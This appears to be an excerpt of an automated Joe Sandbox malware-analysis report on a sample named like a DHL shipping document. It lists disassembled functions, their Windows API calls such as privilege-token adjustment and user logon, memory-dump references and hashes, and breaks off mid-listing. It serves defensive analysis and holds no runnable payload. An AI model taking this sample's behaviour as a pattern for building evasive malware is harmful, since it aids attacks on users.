                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 3429775523-0
                                                                                    • Opcode ID: a56cf165df82949b969c3ffe93aa55f1206796951aff6866b8382aa09fa1afb1
                                                                                    • Instruction ID: 3fd52ee62c81b9a4f42bed2d70b512bca3640adf497b33a440bb02b484596d57
                                                                                    • Opcode Fuzzy Hash: a56cf165df82949b969c3ffe93aa55f1206796951aff6866b8382aa09fa1afb1
                                                                                    • Instruction Fuzzy Hash: F4F03C75D1120CBBDB04DFE49D99AADB7B8FF08201F104869A605E2182D7755A448B50
                                                                                    Function 0081C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0081C6FB
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081C72B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 241e5ed2efe8d3aa718a71ddb2c9a664bf30822ae3b36425df21ffcd9b49d579
                                                                                    • Instruction ID: 8f0b2d7b2a1b54dc1fdbc297e5b9e15a140bc7ac52d53564f46e3aedcc4cd369
                                                                                    • Opcode Fuzzy Hash: 241e5ed2efe8d3aa718a71ddb2c9a664bf30822ae3b36425df21ffcd9b49d579
                                                                                    • Instruction Fuzzy Hash: 691165726006049FDB10DF29D849A6AF7E9FF85324F00891DFAA9D7291DB74AC05CF81
                                                                                    Function 0081A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00829468,?,0083FB84,?), ref: 0081A097
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00829468,?,0083FB84,?), ref: 0081A0A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: 2ab53e6502aeafbcca741db00b19e2073946c050222dd2e264c9b1bc4651aeeb
                                                                                    • Instruction ID: cfeb0db3c7d95a69a2bb613223a3eccc69b856be990641b33f775bf14f5bfe20
                                                                                    • Opcode Fuzzy Hash: 2ab53e6502aeafbcca741db00b19e2073946c050222dd2e264c9b1bc4651aeeb
                                                                                    • Instruction Fuzzy Hash: C3F0823550522DEBDB219FA4CC49FEA776CFF0C361F004165F909D6191D6709940CBE1
                                                                                    Function 008081CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00808309), ref: 008081E0
                                                                                    • CloseHandle.KERNEL32(?,?,00808309), ref: 008081F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: ab97e9df0517a668b8e3748fad9e896f03acf7c0d9030e00213398946927ee5a
                                                                                    • Instruction ID: 937807be82a67fdecff6c3998cdf193ea64f3b626b67e84dad38c085fdfcb745
                                                                                    • Opcode Fuzzy Hash: ab97e9df0517a668b8e3748fad9e896f03acf7c0d9030e00213398946927ee5a
                                                                                    • Instruction Fuzzy Hash: 1AE0BF71010510EFE7252B75EC09E7777A9FF44310B14982EB59584571DB615C91DB50
                                                                                    Function 007DA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,007D8D57,?,?,?,00000001), ref: 007DA15A
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007DA163
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: f8a808fd290c3e9e18cf4189e8b4d6089718611bf4ac631f1ae3066525b6723f
                                                                                    • Instruction ID: 8859b48166b33bcc81c24758b81b71f174780e3a0f7d4438b90c30d8bd9615e7
                                                                                    • Opcode Fuzzy Hash: f8a808fd290c3e9e18cf4189e8b4d6089718611bf4ac631f1ae3066525b6723f
                                                                                    • Instruction Fuzzy Hash: B4B09231454208ABCA002B91EC09B8A3F68FB85AA2F404420F70D85262CB6254508AD1
                                                                                    Function 007DF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bab57e6021264d31473bbde600375ed41721a022ca76a964b6b24e1f4ee8b6f7
                                                                                    • Instruction ID: c0f1d15630d45ac3c89673db884c1dfe351bedb19354ffcfa5888fb961d32a1e
                                                                                    • Opcode Fuzzy Hash: bab57e6021264d31473bbde600375ed41721a022ca76a964b6b24e1f4ee8b6f7
                                                                                    • Instruction Fuzzy Hash: 3232E026D29F414DD7239634D832336A299EFB73D4F15D737E81AB5AA6EB28D4838100
                                                                                    Function 007E242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b4dbeee81633ffdcad1d6aa89bde56d201034b6cc5530a4e06ad6e5b40758d4c
                                                                                    • Instruction ID: 6fb0c3a7f2eabd6fb52cf0868ccf8ed0eb9aa2711635b9eafbeb61b0849e7b58
                                                                                    • Opcode Fuzzy Hash: b4dbeee81633ffdcad1d6aa89bde56d201034b6cc5530a4e06ad6e5b40758d4c
                                                                                    • Instruction Fuzzy Hash: 96B1DE34E6AF414DD2239A398835336B65CBFBB2D9B51D71BFC2674E22FB2185838141
                                                                                    Function 00818889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 0081889B
                                                                                      • Part of subcall function 007D520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00818F6E,00000000,?,?,?,?,0081911F,00000000,?), ref: 007D5213
                                                                                      • Part of subcall function 007D520A: __aulldiv.LIBCMT ref: 007D5233
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID:
                                                                                    • API String ID: 2893107130-0
                                                                                    • Opcode ID: ceda32a2ba5c30fa6c4f65f27d448edaa85ea5318a6b6973b7a5d5b52bd7b8e0
                                                                                    • Instruction ID: 6f1ca99463868ac540885e08ff189252c08a7362bab212b85119d477174b5670
                                                                                    • Opcode Fuzzy Hash: ceda32a2ba5c30fa6c4f65f27d448edaa85ea5318a6b6973b7a5d5b52bd7b8e0
                                                                                    • Instruction Fuzzy Hash: 4A21E432635510CBC329CF29D841A92B3E5FFA4310B688E2CD0F9CB2C0CA34B945DB54
                                                                                    Function 00814C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00814C4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    • Opcode ID: f5c77f327e4306d8d5b554755586183e83105bf6d7e5d5f82e76f7d3e859e9b8
                                                                                    • Instruction ID: ef65d2659280b2e4fc2cb1c90e016563ba929c38d0c06e81312d0dbe741d7ef9
                                                                                    • Opcode Fuzzy Hash: f5c77f327e4306d8d5b554755586183e83105bf6d7e5d5f82e76f7d3e859e9b8
                                                                                    • Instruction Fuzzy Hash: 04D09EA516561D79ED1C07649E1FFFB114DFB40796FD8B5497601CA0C2ECA05CC461B1
                                                                                    Function 008087B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00808389), ref: 008087D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LogonUser
                                                                                    • String ID:
                                                                                    • API String ID: 1244722697-0
                                                                                    • Opcode ID: a5f88d4663ce5e9569c176ea4791decbae9bc8fe5bce6d16c53944f43bca0d92
                                                                                    • Instruction ID: 97306455250ad9684197eef7210e73c3eee3d0aa55da970f152e12930e6d1d2c
                                                                                    • Opcode Fuzzy Hash: a5f88d4663ce5e9569c176ea4791decbae9bc8fe5bce6d16c53944f43bca0d92
                                                                                    • Instruction Fuzzy Hash: A7D09E3226490EABEF019EA8DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                                                                                    Function 007DA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007DA12A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 4f210eedf9f7b597c304486aa0537b74288cb3f3782c130dfc398e6b26902837
                                                                                    • Instruction ID: e88886c1003158ed5f77fcaba7b7e7d773309aaa524d4dfcdf100968e71a5419
                                                                                    • Opcode Fuzzy Hash: 4f210eedf9f7b597c304486aa0537b74288cb3f3782c130dfc398e6b26902837
                                                                                    • Instruction Fuzzy Hash: E7A0123000010CA78A001B41EC044457F5CE641190B004020F50C411228732541045C0
                                                                                    Function 007C8808 Relevance: .6, Instructions: 590COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 28d2f1837e1f9254482c6ea5a410312ab101cf1fb22c206c1141cf4460e62a8b
                                                                                    • Instruction ID: 7c48238c59606f9351ade9da6e848d6bd7da1d14a22df324c1806dd3ee390258
                                                                                    • Opcode Fuzzy Hash: 28d2f1837e1f9254482c6ea5a410312ab101cf1fb22c206c1141cf4460e62a8b
                                                                                    • Instruction Fuzzy Hash: B4223430604516CBDFA88A28C894B7DB7A1FF41344F29806ED946CB5D2EB78ED91CB53
                                                                                    Function 007D21C5 Relevance: .3, Instructions: 345COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction ID: ddcd63f640d2f801ead943866dcf31e680e75eef9d1a04c9caf70dfed3314170
                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction Fuzzy Hash: 2AC1853230519309DB2D4639843443EFAB15EA27B136A075FD8B3CB6D5EF18D927D620
                                                                                    Function 007D25FA Relevance: .3, Instructions: 341COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction ID: 23bd3cd3aedd27a819b716f0ab5188dcd0e0b5225b41eb71defd379c3f8a124f
                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction Fuzzy Hash: C4C1743230519309DF2D4639C43413EBAB15EA27B135A076FD4B2DB6D5EF18D926D620
                                                                                    Function 007D1978 Relevance: .3, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction ID: 4fcf91bc62a5d56aa00c6638a4e4e665743fc97e1ac38997464d2cf61c7b603d
                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction Fuzzy Hash: 7DC1813230919319DF2D4639843413EBBB25EA27B139A076FD4B2DB6D5EF28C925D620
                                                                                    Function 00827806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 0082785B
                                                                                    • DeleteObject.GDI32(00000000), ref: 0082786D
                                                                                    • DestroyWindow.USER32 ref: 0082787B
                                                                                    • GetDesktopWindow.USER32 ref: 00827895
                                                                                    • GetWindowRect.USER32(00000000), ref: 0082789C
                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008279DD
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008279ED
                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827A35
                                                                                    • GetClientRect.USER32(00000000,?), ref: 00827A41
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00827A7B
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827A9D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827AB0
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827ABB
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00827AC4
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827AD3
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00827ADC
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827AE3
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00827AEE
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827B00
                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00842CAC,00000000), ref: 00827B16
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00827B26
                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00827B4C
                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00827B6B
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827B8D
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827D7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    • Opcode ID: f475e6701f5b5e78a5a1d5c1a42a75a3895ce3ecaa1f0cdb6e0eb668933badbe
                                                                                    • Instruction ID: 1aff7c00a683a4c375a441f03e656ccf0a97347a4612484f471b476043907f9c
                                                                                    • Opcode Fuzzy Hash: f475e6701f5b5e78a5a1d5c1a42a75a3895ce3ecaa1f0cdb6e0eb668933badbe
                                                                                    • Instruction Fuzzy Hash: 8C024B71900219EFDB14DFA5DC89EAE7BB9FB48310F108558FA15EB2A2C7749D41CBA0
                                                                                    Function 0083356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
